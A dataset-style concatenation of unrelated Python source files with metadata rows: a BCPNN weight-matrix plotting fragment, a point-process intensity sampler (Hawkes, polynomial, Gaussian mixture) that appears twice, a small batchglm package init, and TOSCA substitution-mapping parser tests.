cmap = 'coolwarm'
im = ax.imshow(w, cmap=cmap, interpolation='None', vmin=-aux_max, vmax=aux_max)
divider = make_axes_locatable(ax)
cax = divider.append_axes('right', size='5%', pad=0.05)
ax.get_figure().colorbar(im, ax=ax, cax=cax)
# Add text
fontsize = 18
for sequence in sequences:
print(sequence)
for i in range(len(sequence) - 1):
coordinate_from = sequence[i]
coordinate_to = sequence[i + 1]
set_text(ax, coordinate_from=coordinate_from, coordinate_to=coordinate_to, fontsize=fontsize)
# Editing
ax.grid()
ax.set_title('Sequences with overlap')
ax.set_xlabel('Input')
ax.set_ylabel('Output')
fname = './plots/matrix_overlap.pdf'
plt.savefig(fname, format='pdf', dpi=100, bbox_inches='tight', frameon=True, transparent=False)
plt.show()
if overloaded_pot:
# Patterns parameters
hypercolumns = 4
minicolumns = 23
n_patterns = 10
dt = 0.001
# Manager properties
dt = 0.001
T_recalling = 5.0
values_to_save = ['o']
# Protocol
training_time = 0.3
inter_sequence_interval = 3.0
inter_pulse_interval = 0.0
epochs = 3
tau_p = 100.0
# Build the network
nn = BCPNNFast(hypercolumns, minicolumns, sigma=0, tau_p=tau_p)
# Build the manager
manager = NetworkManager(nn=nn, dt=dt, values_to_save=values_to_save)
# Build chain protocol
chain_protocol = Protocol()
sequences = [[1, 2, 0, 3, 4], [5, 6, 0, 7, 8], [9, 10, 0, 11, 12], [13, 14, 0, 15, 16]]
chain_protocol.cross_protocol(sequences, training_time=training_time,
inter_sequence_interval=inter_sequence_interval, epochs=epochs)
print(sequences)
# Train
manager.run_network_protocol(protocol=chain_protocol, verbose=True)
# Now plotting
w = nn.w
fig = plt.figure(figsize=(16, 12))
ax = fig.add_subplot(111)
w = w[:nn.minicolumns, :nn.minicolumns]
aux_max = np.max(np.abs(w))
cmap = 'coolwarm'
im = ax.imshow(w, cmap=cmap, interpolation='None', vmin=-aux_max, vmax=aux_max)
divider = make_axes_locatable(ax)
cax = divider.append_axes('right', size='5%', pad=0.05)
ax.get_figure().colorbar(im, ax=ax, cax=cax)
# Add text
fontsize = 8
for sequence in sequences:
print(sequence)
for i in range(len(sequence) - 1):
coordinate_from = sequence[i]
coordinate_to = sequence[i + 1]
set_text(ax, coordinate_from=coordinate_from, coordinate_to=coordinate_to, fontsize=fontsize)
# Editing
ax.grid()
ax.set_title('High overload scenario')
ax.set_xlabel('Input')
ax.set_ylabel('Output')
fname = './plots/matrix_overload.pdf'
plt.savefig(fname, format='pdf', dpi=100, bbox_inches='tight', frameon=True, transparent=False)
plt.show()
| 26 | 118 | 0.659787 | 885 | 6,396 | 4.578531 | 0.186441 | 0.017769 | 0.026654 | 0.010859 | 0.813919 | 0.788253 | 0.75 | 0.75 | 0.728036 | 0.728036 | 0 | 0.036519 | 0.229362 | 6,396 | 245 | 119 | 26.106122 | 0.785555 | 0.07192 | 0 | 0.719178 | 0 | 0 | 0.04353 | 0.013211 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.061644 | 0 | 0.061644 | 0.027397 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7abf5cab6ce3a9fc699393b6428c4c6f6622deb5 | 17,053 | py | Python | ppgen.py | xiaoshuai09/pp | 09643962f8baba951f73a2760a49e50b44a3359f | [
"MIT"
] | 1 | 2021-05-13T11:21:32.000Z | 2021-05-13T11:21:32.000Z | ppgen.py | xiaoshuai09/pp | 09643962f8baba951f73a2760a49e50b44a3359f | [
"MIT"
] | null | null | null | ppgen.py | xiaoshuai09/pp | 09643962f8baba951f73a2760a49e50b44a3359f | [
"MIT"
] | 3 | 2018-10-04T22:58:20.000Z | 2020-02-12T06:51:59.000Z | #!/usr/bin/env python
import abc
import scipy.stats
import numpy as np
class Intensity(object):
__metaclass__ = abc.ABCMeta
class IntensityHomogenuosPoisson(Intensity):
def __init__(self, lam):
self.lam = lam
def get_value(self, t=None, past_ts=None):
return self.lam
def get_upper_bound(self, past_ts=None, t=None, to_t=None):
return self.lam
class IntensityGaussianMixture(Intensity):
def __init__(self, k=2, centers=[2, 4], stds=[1, 1], coefs= [1, 1]):
self.k = k
self.centers = centers
self.stds = stds
self.coefs = coefs
def get_value(self, t=None, past_ts=None):
return self._get_gaussianmixture_value(t)
def get_upper_bound(self, past_ts=None, t=None, to_t=None):
max_val = sum([ self._get_gaussianmixture_value(center) for center in self.centers ])
return max_val
def _get_gaussianmixture_value(self, t):
inten = 0
for i in range(self.k):
inten += self.coefs[i] * scipy.stats.norm.pdf(t, self.centers[i], self.stds[i])
return inten
def get_integral(self, t, past_ts=None):
return sum([ coef * (scipy.stats.norm.cdf(t, center, std) - \
scipy.stats.norm.cdf(0, center, std))
for coef, center, std in zip(self.coefs, self.centers, self.stds) ])
class IntensityHawkes(Intensity):
def __init__(self, mu=1, alpha=0.3, beta=1):
self.mu = mu
self.alpha = alpha
self.beta = beta
def get_value(self, t=None, past_ts=None):
inten = self.mu + np.sum(self.alpha * self.beta * np.exp(-self.beta * np.subtract(t, past_ts)))
return inten
def get_upper_bound(self, past_ts=None, t=None, to_t=None):
max_val = self.mu + np.sum(self.alpha * self.beta * np.exp(-self.beta * np.subtract(t, past_ts)))
return max_val
def get_integral(self, t, past_ts):
return self.mu * t + \
self.alpha * np.sum(1 - np.exp(-self.beta * (t - np.array(past_ts))))
class IntensityPoly(Intensity):
def __init__(self, segs=[0, 1, 2, 3], b=0, A=[1, 2, -3]):
self.segs = segs
self.b = b
self.A = A
if len(A) != len(segs) - 1:
raise Exception("Inequality lies in the numbers of segs and A.")
def get_value(self, t=None, past_ts=None):
return self._get_poly_value(t)
def get_upper_bound(self, past_ts=None, t=None, to_t=None):
max_val = 0
segs_within_range = [ s for s in self.segs if s > t and s < to_t ]
if len(segs_within_range) > 0:
max_val = max([ self._get_poly_value(t) for s in segs_within_range ])
max_val = max([ self._get_poly_value(t), self._get_poly_value(to_t), max_val ])
return max_val
def _get_poly_value(self, t):
if t > self.segs[-1]:
raise Exception("t is out of range.")
segs_before_t = [ s for s in self.segs if s < t ]
b = self.b
for seg_ind in range(len(segs_before_t)-1):
b = b + self.A[seg_ind] * (segs_before_t[seg_ind+1] - segs_before_t[seg_ind])
if len(segs_before_t) >= 1:
value = b + self.A[len(segs_before_t)-1] * (t - segs_before_t[len(segs_before_t)-1])
else:
value = b
return value
def get_integral(self, t, past_ts=None):
if t > self.segs[-1]:
raise Exception("t is out of range.")
segs_before_t = [ s for s in self.segs if s < t ]
# get starting intercepts (bs) for each of segments (size = len(segs_before_t) + 1)
bs = [self.b]
for seg_ind in range(len(segs_before_t)-1):
b = bs[seg_ind] + self.A[seg_ind] * \
(segs_before_t[seg_ind+1] - segs_before_t[seg_ind])
bs.append(b)
bs.append(self._get_poly_value(t)) # last intercept
# get length of each of segments (size = len(segs_before_t))
lens = []
for seg_ind in range(len(segs_before_t)-1):
lens.append(segs_before_t[seg_ind+1] - segs_before_t[seg_ind])
last_seg = segs_before_t[-1] if len(segs_before_t) > 0 else 0
lens.append(t - last_seg) # lengths of last segments
# get integrals (area) for each of segments
integrals = [ (width1 + width2) * height / 2.
for width1, width2, height in zip(bs[:-1], bs[1:], lens) ]
return sum(integrals)
#
# class IntensitySelfCorrecting(Intensity):
#
# def __init__(self, mu=1, alpha=0.3):
# self.mu = mu
# self.alpha = alpha
#
# def get_value(self, t, past_ts):
# return np.exp(self.mu * t - self.alpha * len(past_ts))
#
# def get_upper_bound(self, past_ts=None, t=None, to_t):
# # TODO: Improve this upper bound
# return np.exp(self.mu * to_t)
#
# def get_integral(self, t, past_ts):
# for past_t in past_ts:
# past_t
# return
class IntensityHawkesPlusPoly(IntensityHawkes, IntensityPoly):
def __init__(self, mu=1, alpha=0.3, beta=1,
segs=[0, 1, 2, 3], b=0, A=[1, 2, -3]):
IntensityPoly.__init__(self, segs=segs, b=b, A=A)
IntensityHawkes.__init__(self, mu=mu, alpha=alpha, beta=beta)
def get_value(self, t=None, past_ts=None):
return IntensityHawkes.get_value(self, t=t, past_ts=past_ts) + \
IntensityPoly.get_value(self, t=t)
def get_upper_bound(self, past_ts=None, t=None, to_t=None):
return IntensityPoly.get_upper_bound(self, t=t, to_t=to_t) + \
IntensityHawkes.get_upper_bound(self, past_ts=past_ts, t=t)
def get_integral(self, t, past_ts):
return IntensityPoly.get_integral(self, t=t) + \
IntensityHawkes.get_integral(self, t=t, past_ts=past_ts)
class IntensityHawkesPlusGaussianMixture(IntensityHawkes, IntensityGaussianMixture):
def __init__(self, mu=1, alpha=0.3, beta=1,
k=2, centers=[2, 4], stds=[1, 1], coefs=[1, 1]):
IntensityHawkes.__init__(self, mu=mu, alpha=alpha, beta=beta)
IntensityGaussianMixture.__init__(self, k=k, centers=centers, stds=stds, coefs=coefs)
def get_value(self, t=None, past_ts=None):
return IntensityHawkes.get_value(self, t=t, past_ts=past_ts) + \
IntensityGaussianMixture.get_value(self, t=t)
def get_upper_bound(self, past_ts=None, t=None, to_t=None):
return IntensityGaussianMixture.get_upper_bound(self, t=t, to_t=to_t) + \
IntensityHawkes.get_upper_bound(self, past_ts=past_ts, t=t)
def get_integral(self, t, past_ts):
return IntensityGaussianMixture.get_integral(self, t=t) + \
IntensityHawkes.get_integral(self, t=t, past_ts=past_ts)
def generate_sample(intensity, T, n):
seqs = []
i = 0
while True:
past_ts = []
cur_t = 0
while True:
intens1 = intensity.get_upper_bound(past_ts=past_ts, t=cur_t, to_t=T)
intens1 = intens1 if intens1 != 0 else 1e-4
t_delta = np.random.exponential(1.0/float(intens1))
next_t = cur_t + t_delta
# print "cur_t:%f, next_t:%f, delta_t:%f" % (cur_t, next_t, t_delta)
if next_t > T:
break
intens2 = intensity.get_value(t=next_t, past_ts=past_ts)
u = np.random.uniform()
if float(intens2)/float(intens1) >= u:
past_ts.append(next_t)
cur_t = next_t
if len(past_ts) > 1:
seqs.append(past_ts)
i += 1
if i == n:
break
return seqs
if __name__ == "__main__":
n = 2
T = 10.
intensity_hawkes = IntensityHawkes(mu=1, alpha=0.3, beta=1)
intensity_poly = IntensityPoly(segs=[0, T/4., T*2./4., T*3./4., T],
b=0, A=[2, -2, 2, -2])
intensity_hawkes_poly = IntensityHawkesPlusPoly(mu=1, alpha=0.3, beta=1,
segs=[0, T/4, T*2/4, T*3/4, T],
b=1, A=[1, -1, 1, -1])
intensity_hawkes_gaussianmixture = IntensityHawkesPlusGaussianMixture(mu=1, alpha=0.3, beta=1,
k=2, centers=[T/4, T*3/4], stds=[1, 1], coefs=[1, 1])
print generate_sample(intensity_poly, T, n)
# -*- coding: utf-8 -*-
import abc
import scipy.stats
import numpy as np
class Intensity(object):
__metaclass__ = abc.ABCMeta
class IntensityHomogenuosPoisson(Intensity):
def __init__(self, lam):
self.lam = lam
def get_value(self, t=None, past_ts=None):
return self.lam
def get_upper_bound(self, past_ts=None, t=None, to_t=None):
return self.lam
class IntensityGaussianMixture(Intensity):
def __init__(self, k=2, centers=[2, 4], stds=[1, 1], coefs= [1, 1]):
self.k = k
self.centers = centers
self.stds = stds
self.coefs = coefs
def get_value(self, t=None, past_ts=None):
return self._get_gaussianmixture_value(t)
def get_upper_bound(self, past_ts=None, t=None, to_t=None):
max_val = sum([ self._get_gaussianmixture_value(center) for center in self.centers ])
return max_val
def _get_gaussianmixture_value(self, t):
inten = 0
for i in range(self.k):
inten += self.coefs[i] * scipy.stats.norm.pdf(t, self.centers[i], self.stds[i])
return inten
def get_integral(self, t, past_ts=None):
return sum([ coef * (scipy.stats.norm.cdf(t, center, std) - \
scipy.stats.norm.cdf(0, center, std))
for coef, center, std in zip(self.coefs, self.centers, self.stds) ])
class IntensityHawkes(Intensity):
def __init__(self, mu=1, alpha=0.3, beta=1):
self.mu = mu
self.alpha = alpha
self.beta = beta
def get_value(self, t=None, past_ts=None):
inten = self.mu + np.sum(self.alpha * self.beta * np.exp(-self.beta * np.subtract(t, past_ts)))
return inten
def get_upper_bound(self, past_ts=None, t=None, to_t=None):
max_val = self.mu + np.sum(self.alpha * self.beta * np.exp(-self.beta * np.subtract(t, past_ts)))
return max_val
def get_integral(self, t, past_ts):
return self.mu * t + \
self.alpha * np.sum(1 - np.exp(-self.beta * (t - np.array(past_ts))))
class IntensityPoly(Intensity):
def __init__(self, segs=[0, 1, 2, 3], b=0, A=[1, 2, -3]):
self.segs = segs
self.b = b
self.A = A
if len(A) != len(segs) - 1:
raise Exception("Inequality lies in the numbers of segs and A.")
def get_value(self, t=None, past_ts=None):
return self._get_poly_value(t)
def get_upper_bound(self, past_ts=None, t=None, to_t=None):
max_val = 0
segs_within_range = [ s for s in self.segs if s > t and s < to_t ]
if len(segs_within_range) > 0:
max_val = max([ self._get_poly_value(t) for s in segs_within_range ])
max_val = max([ self._get_poly_value(t), self._get_poly_value(to_t), max_val ])
return max_val
def _get_poly_value(self, t):
if t > self.segs[-1]:
raise Exception("t is out of range.")
segs_before_t = [ s for s in self.segs if s < t ]
b = self.b
for seg_ind in range(len(segs_before_t)-1):
b = b + self.A[seg_ind] * (segs_before_t[seg_ind+1] - segs_before_t[seg_ind])
if len(segs_before_t) >= 1:
value = b + self.A[len(segs_before_t)-1] * (t - segs_before_t[len(segs_before_t)-1])
else:
value = b
return value
def get_integral(self, t, past_ts=None):
if t > self.segs[-1]:
raise Exception("t is out of range.")
segs_before_t = [ s for s in self.segs if s < t ]
# get starting intercepts (bs) for each of segments (size = len(segs_before_t) + 1)
bs = [self.b]
for seg_ind in range(len(segs_before_t)-1):
b = bs[seg_ind] + self.A[seg_ind] * \
(segs_before_t[seg_ind+1] - segs_before_t[seg_ind])
bs.append(b)
bs.append(self._get_poly_value(t)) # last intercept
# get length of each of segments (size = len(segs_before_t))
lens = []
for seg_ind in range(len(segs_before_t)-1):
lens.append(segs_before_t[seg_ind+1] - segs_before_t[seg_ind])
last_seg = segs_before_t[-1] if len(segs_before_t) > 0 else 0
lens.append(t - last_seg) # lengths of last segments
# get integrals (area) for each of segments
integrals = [ (width1 + width2) * height / 2.
for width1, width2, height in zip(bs[:-1], bs[1:], lens) ]
return sum(integrals)
# class IntensitySelfCorrecting(Intensity):
# def __init__(self, ):
# pass
#
# def get_value(self, t=None, past_ts=None):
# return np.exp(self.mu * t - np.sum(self.alpha))
#
# def get_upper_bound(self, ):
# pass
#
# def get_integral(self, ):
# pass
class IntensityHawkesPlusPoly(IntensityHawkes, IntensityPoly):
def __init__(self, mu=1, alpha=0.3, beta=1,
segs=[0, 1, 2, 3], b=0, A=[1, 2, -3]):
IntensityPoly.__init__(self, segs=segs, b=b, A=A)
IntensityHawkes.__init__(self, mu=mu, alpha=alpha, beta=beta)
def get_value(self, t=None, past_ts=None):
return IntensityHawkes.get_value(self, t=t, past_ts=past_ts) + \
IntensityPoly.get_value(self, t=t)
def get_upper_bound(self, past_ts=None, t=None, to_t=None):
return IntensityPoly.get_upper_bound(self, t=t, to_t=to_t) + \
IntensityHawkes.get_upper_bound(self, past_ts=past_ts, t=t)
def get_integral(self, t, past_ts):
return IntensityPoly.get_integral(self, t=t) + \
IntensityHawkes.get_integral(self, t=t, past_ts=past_ts)
class IntensityHawkesPlusGaussianMixture(IntensityHawkes, IntensityGaussianMixture):
def __init__(self, mu=1, alpha=0.3, beta=1,
k=2, centers=[2, 4], stds=[1, 1], coefs=[1, 1]):
IntensityHawkes.__init__(self, mu=mu, alpha=alpha, beta=beta)
IntensityGaussianMixture.__init__(self, k=k, centers=centers, stds=stds, coefs=coefs)
def get_value(self, t=None, past_ts=None):
return IntensityHawkes.get_value(self, t=t, past_ts=past_ts) + \
IntensityGaussianMixture.get_value(self, t=t)
def get_upper_bound(self, past_ts=None, t=None, to_t=None):
return IntensityGaussianMixture.get_upper_bound(self, t=t, to_t=to_t) + \
IntensityHawkes.get_upper_bound(self, past_ts=past_ts, t=t)
def get_integral(self, t, past_ts):
return IntensityGaussianMixture.get_integral(self, t=t) + \
IntensityHawkes.get_integral(self, t=t, past_ts=past_ts)
def generate_sample(intensity, T, n):
seqs = []
i = 0
while True:
past_ts = []
cur_t = 0
while True:
intens1 = intensity.get_upper_bound(past_ts=past_ts, t=cur_t, to_t=T)
t_delta = np.random.exponential(1.0/float(intens1))
next_t = cur_t + t_delta
# print "cur_t:%f, next_t:%f, delta_t:%f" % (cur_t, next_t, t_delta)
if next_t > T:
break
intens2 = intensity.get_value(t=next_t, past_ts=past_ts)
u = np.random.uniform()
if float(intens2)/float(intens1) >= u:
past_ts.append(next_t)
cur_t = next_t
if len(past_ts) > 1:
seqs.append(past_ts)
i += 1
if i == n:
break
return seqs
# if __name__ == "__main__":
# n = 2
# T = 20
# intensity_hawkes = IntensityHawkes(mu=1, alpha=0.3, beta=1)
# intensity_poly = IntensityPoly(segs=[0, T/4, T*2/4, T*3/4, T],
# b=0, A=[1, -1, 1, -1])
# intensity_hawkes_poly = IntensityHawkesPlusPoly(mu=1, alpha=0.3, beta=1,
# segs=[0, T/4, T*2/4, T*3/4, T],
# b=1, A=[1, -1, 1, -1])
# intensity_hawkes_gaussianmixture = IntensityHawkesPlusGaussianMixture(mu=1, alpha=0.3, beta=1,
# k=2, centers=[T/4, T*3/4], stds=[1, 1], coefs=[1, 1])
# # seqs = generate_sample(intensity_hawkes_poly, T, n)
| 39.750583 | 130 | 0.569108 | 2,472 | 17,053 | 3.699029 | 0.056634 | 0.05643 | 0.045713 | 0.031277 | 0.973316 | 0.965879 | 0.960192 | 0.959755 | 0.956912 | 0.955818 | 0 | 0.022192 | 0.307688 | 17,053 | 428 | 131 | 39.843458 | 0.752329 | 0.125902 | 0 | 0.956522 | 0 | 0 | 0.011789 | 0 | 0 | 0 | 0 | 0.002336 | 0 | 0 | null | null | 0 | 0.020067 | null | null | 0.003344 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8fbdb2280632400c992dc1a5d000be6b8fdbeab8 | 67 | py | Python | batchglm/api/models/tf2/__init__.py | le-ander/batchglm | 31b905b99b6baa7c94b82550d6a74f00d81966ea | [
"BSD-3-Clause"
] | null | null | null | batchglm/api/models/tf2/__init__.py | le-ander/batchglm | 31b905b99b6baa7c94b82550d6a74f00d81966ea | [
"BSD-3-Clause"
] | null | null | null | batchglm/api/models/tf2/__init__.py | le-ander/batchglm | 31b905b99b6baa7c94b82550d6a74f00d81966ea | [
"BSD-3-Clause"
] | null | null | null | from . import glm_beta
from . import glm_nb
from . import glm_norm
| 16.75 | 22 | 0.776119 | 12 | 67 | 4.083333 | 0.5 | 0.612245 | 0.795918 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.179104 | 67 | 3 | 23 | 22.333333 | 0.890909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8903b978cc1e1cbe4cd9d3e2de370c34fb612089 | 11,176 | py | Python | tests/extensions/aria_extension_tosca/simple_v1_0/templates/test_substitution_mappings.py | tnadeau/incubator-ariatosca | de32028783969bc980144afa3c91061c7236459c | [
"Apache-2.0"
] | null | null | null | tests/extensions/aria_extension_tosca/simple_v1_0/templates/test_substitution_mappings.py | tnadeau/incubator-ariatosca | de32028783969bc980144afa3c91061c7236459c | [
"Apache-2.0"
] | null | null | null | tests/extensions/aria_extension_tosca/simple_v1_0/templates/test_substitution_mappings.py | tnadeau/incubator-ariatosca | de32028783969bc980144afa3c91061c7236459c | [
"Apache-2.0"
] | 1 | 2020-06-16T15:13:06.000Z | 2020-06-16T15:13:06.000Z | # -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from .. import data
@pytest.mark.parametrize('value', data.NOT_A_DICT)
def test_substitution_mappings_syntax_type(parser, value):
parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
topology_template:
substitution_mappings: {{ value }}
""", dict(value=value)).assert_failure()
def test_substitution_mappings_syntax_unsupported(parser):
parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
node_types:
MyType: {}
topology_template:
substitution_mappings:
node_type: MyType
unsupported: {}
""").assert_failure()
def test_substitution_mappings_syntax_empty(parser):
parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
topology_template:
substitution_mappings: {} # "node_type" is required
""").assert_failure()
# Node type
def test_substitution_mappings_node_type_syntax_type(parser):
parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
topology_template:
description: a description
substitution_mappings:
node_type: {{ value }}
""").assert_failure()
# Requirements section
@pytest.mark.parametrize('value', data.NOT_A_DICT)
def test_substitution_mappings_requirements_section_syntax_type(parser, value):
parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
node_types:
MyType: {}
topology_template:
substitution_mappings:
node_type: MyType
requirements: {{ value }}
""", dict(value=value)).assert_failure()
def test_substitution_mappings_requirements_section_syntax_empty(parser):
parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
node_types:
MyType: {}
topology_template:
substitution_mappings:
node_type: MyType
requirements: {}
""").assert_success()
# Requirement
@pytest.mark.parametrize('value', data.NOT_A_LIST_OF_TWO)
def test_substitution_mappings_requirement_syntax_type(parser, value):
parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
capability_types:
MyType: {}
node_types:
MyType:
requirements:
- my_requirement:
capability: MyType
topology_template:
substitution_mappings:
node_type: MyType
requirements:
my_requirement: {{ value }}
""", dict(value=value)).assert_failure()
def test_substitution_mappings_requirement_same(parser):
parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
capability_types:
MyType: {}
node_types:
MyType:
requirements:
- my_requirement:
capability: MyType
MyInternalType:
requirements:
- my_internal_requirement:
capability: MyType
topology_template:
node_templates:
my_template:
type: MyInternalType
substitution_mappings:
node_type: MyType
requirements:
my_requirement: [ my_template, my_internal_requirement ]
""").assert_success()
def test_substitution_mappings_requirement_derived(parser):
parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
capability_types:
MyType1: {}
MyType2:
derived_from: MyType1
node_types:
MyType:
requirements:
- my_requirement:
capability: MyType1
MyInternalType:
requirements:
- my_internal_requirement:
capability: MyType2
topology_template:
node_templates:
my_template:
type: MyInternalType
substitution_mappings:
node_type: MyType
requirements:
my_requirement: [ my_template, my_internal_requirement ]
""").assert_success()
def test_substitution_mappings_requirement_bad(parser):
parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
capability_types:
MyType1: {}
MyType2: {}
node_types:
MyType:
requirements:
- my_requirement:
capability: MyType1
MyInternalType:
requirements:
- my_internal_requirement:
capability: MyType2
topology_template:
node_templates:
my_template:
type: MyInternalType
substitution_mappings:
node_type: MyType
requirements:
my_requirement: [ my_template, my_internal_requirement ]
""").assert_failure()
def test_substitution_mappings_requirement_unknown(parser):
parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
capability_types:
MyType: {}
node_types:
MyType:
requirements:
- my_requirement:
capability: MyType
MyInternalType:
requirements:
- my_internal_requirement:
capability: MyType
topology_template:
node_templates:
my_template:
type: MyInternalType
substitution_mappings:
node_type: MyType
requirements:
unknown: [ my_template, my_internal_requirement ]
""").assert_failure()
def test_substitution_mappings_requirement_unknown_mapped_template(parser):
parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
capability_types:
MyType: {}
node_types:
MyType:
requirements:
- my_requirement:
capability: MyType
MyInternalType:
requirements:
- my_internal_requirement:
capability: MyType
topology_template:
node_templates:
my_template:
type: MyInternalType
substitution_mappings:
node_type: MyType
requirements:
my_requirement: [ unknown, my_internal_requirement ]
""").assert_failure()
def test_substitution_mappings_requirement_unknown_mapped_requirement(parser):
parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
capability_types:
MyType: {}
node_types:
MyType:
requirements:
- my_requirement:
capability: MyType
MyInternalType:
requirements:
- my_internal_requirement:
capability: MyType
topology_template:
node_templates:
my_template:
type: MyInternalType
substitution_mappings:
node_type: MyType
requirements:
my_requirement: [ my_template, unknown ]
""").assert_failure()
# Capabilities section
@pytest.mark.parametrize('value', data.NOT_A_DICT)
def test_substitution_mappings_capabilities_section_syntax_type(parser, value):
parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
node_types:
MyType: {}
topology_template:
substitution_mappings:
node_type: MyType
capabilities: {{ value }}
""", dict(value=value)).assert_failure()
def test_substitution_mappings_capabilities_section_syntax_empty(parser):
parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
node_types:
MyType: {}
topology_template:
substitution_mappings:
node_type: MyType
capabilities: {}
""").assert_success()
# Capability
@pytest.mark.parametrize('value', data.NOT_A_LIST_OF_TWO)
def test_substitution_mappings_capability_syntax_type(parser, value):
parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
capability_types:
MyType: {}
node_types:
MyType:
capabilities:
my_capability: MyType
topology_template:
substitution_mappings:
node_type: MyType
capabilities:
my_capability: {{ value }}
""", dict(value=value)).assert_failure()
def test_substitution_mappings_capability_same(parser):
parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
capability_types:
MyType: {}
node_types:
MyType:
capabilities:
my_capability: MyType
MyInternalType:
capabilities:
my_internal_capability: MyType
topology_template:
node_templates:
my_template:
type: MyInternalType
substitution_mappings:
node_type: MyType
capabilities:
my_capability: [ my_template, my_internal_capability ]
""").assert_success()
def test_substitution_mappings_capability_derived(parser):
parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
capability_types:
MyType1: {}
MyType2:
derived_from: MyType1
node_types:
MyType:
capabilities:
my_capability: MyType1
MyInternalType:
capabilities:
my_internal_capability: MyType2
topology_template:
node_templates:
my_template:
type: MyInternalType
substitution_mappings:
node_type: MyType
capabilities:
my_capability: [ my_template, my_internal_capability ]
""").assert_success()
def test_substitution_mappings_capability_bad(parser):
parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
capability_types:
MyType1: {}
MyType2: {}
node_types:
MyType:
capabilities:
my_capability: MyType1
MyInternalType:
capabilities:
my_internal_capability: MyType2
topology_template:
node_templates:
my_template:
type: MyInternalType
substitution_mappings:
node_type: MyType
capabilities:
my_capability: [ my_template, my_internal_capability ]
""").assert_failure()
def test_substitution_mappings_capability_unknown(parser):
parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
capability_types:
MyType: {}
node_types:
MyType:
capabilities:
my_capability: MyType
MyInternalType:
capabilities:
my_internal_capability: MyType
topology_template:
node_templates:
my_template:
type: MyInternalType
substitution_mappings:
node_type: MyType
capabilities:
unknown: [ my_template, my_internal_capability ]
""").assert_failure()
def test_substitution_mappings_capability_unknown_mapped_template(parser):
parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
capability_types:
MyType: {}
node_types:
MyType:
capabilities:
my_capability: MyType
MyInternalType:
capabilities:
my_internal_capability: MyType
topology_template:
node_templates:
my_template:
type: MyInternalType
substitution_mappings:
node_type: MyType
capabilities:
my_capability: [ unknown, my_internal_capability ]
""").assert_failure()
def test_substitution_mappings_capability_unknown_mapped_capability(parser):
parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
capability_types:
MyType: {}
node_types:
MyType:
capabilities:
my_capability: MyType
MyInternalType:
capabilities:
my_internal_capability: MyType
topology_template:
node_templates:
my_template:
type: MyInternalType
substitution_mappings:
node_type: MyType
capabilities:
my_capability: [ my_template, unknown ]
""").assert_failure()
| 24.835556 | 79 | 0.757158 | 1,241 | 11,176 | 6.414182 | 0.101531 | 0.110553 | 0.052513 | 0.074623 | 0.884925 | 0.875503 | 0.874497 | 0.86005 | 0.85691 | 0.841332 | 0 | 0.007165 | 0.163296 | 11,176 | 449 | 80 | 24.890869 | 0.844081 | 0.075966 | 0 | 0.891534 | 0 | 0 | 0.709393 | 0.196487 | 0 | 0 | 0 | 0 | 0.058201 | 1 | 0.058201 | false | 0 | 0.005291 | 0 | 0.063492 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
